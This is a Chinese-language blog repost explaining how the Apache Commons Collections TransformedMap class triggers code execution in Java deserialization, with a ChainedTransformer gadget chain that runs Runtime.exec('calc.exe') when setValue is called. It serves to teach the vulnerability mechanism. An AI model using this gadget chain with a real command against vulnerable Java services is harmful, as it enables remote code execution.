中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

java反序列化 - transformedMap類可以執行惡意代碼的原理

發布時間:2020-07-08 23:08:06 來源:網絡 閱讀:1574 作者:wx5b0b88843cb2a 欄目:安全技術

java反序列化 - transformedMap類可以執行惡意代碼的原理

0x00 代碼

Map map=new HashMap();
         map.put("key","value");
         //調用目標對象的toString方法
         String command="calc.exe";
         final String[] execArgs = new String[] { command };
         final Transformer[] transformers = new Transformer[] {
                 new ConstantTransformer(Runtime.class),
                 new InvokerTransformer("getMethod", new Class[] {
                         String.class, Class[].class }, new Object[] {
                         "getRuntime", new Class[0] }),
                 new InvokerTransformer("invoke", new Class[] {
                         Object.class, Object[].class }, new Object[] {
                         null, new Object[0] }),
                 new InvokerTransformer("exec",
                         new Class[] { String.class }, execArgs)
         };
         Transformer transformer=new ChainedTransformer(transformers);
         Map<String, Object> transformedMap=TransformedMap.decorate(map,null,transformer);

         for (Map.Entry<String,Object> entry:transformedMap.entrySet()){
            System.out.println(entry);
             entry.setValue("anything");
         }

執行結果:
java反序列化 - transformedMap類可以執行惡意代碼的原理

0x01 transformedMap類為什么可以執行惡意代碼?

通過上一篇https://blog.51cto.com/13770310/2160737文章, 可知ChainedTransformer的transformer方法可以執行惡意代碼。
上述代碼的關鍵是:

         for (Map.Entry<String,Object> entry:transformedMap.entrySet()){
            System.out.println(entry);
             entry.setValue("anything");
         }

為什么執行了 entry.setValue("anything");就可以造成惡意代碼執行呢?接下來我們看transformedMap類的checkSetValue方法:


    /**
     * Override to transform the value when using <code>setValue</code>.
     * 
     * @param value  the value to transform
     * @return the transformed value
     * @since Commons Collections 3.1
     */
    protected Object checkSetValue(Object value) {
        return valueTransformer.transform(value);
    }

當transformedMap對象執行setValue方法時會調用valueTransformer的transform方法,如果傳入的valueTransformer是ChainedTransformer的對象,那不就可以造成惡意代碼執行了嗎。
接著查看上面代碼:
java反序列化 - transformedMap類可以執行惡意代碼的原理
因此該代碼的核心還是使用的ChainedTransformer的transformer方法

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

绥棱县| 崇明县| 佳木斯市| 靖西县| 长宁县| 乌审旗| 阿勒泰市| 万宁市| 丰台区| 宜城市| 股票| 遂川县| 府谷县| 花莲县| 浦东新区| 邵武市| 抚远县| 淮阳县| 丹凤县| 普洱| 孙吴县| 通榆县| 德昌县| 定边县| 黄冈市| 淅川县| 阿拉善右旗| 阳泉市| 旅游| 安仁县| 西乌珠穆沁旗| 永清县| 桑植县| 青铜峡市| 武隆县| 沭阳县| 蒲江县| 达尔| 邢台县| 永新县| 吉安市|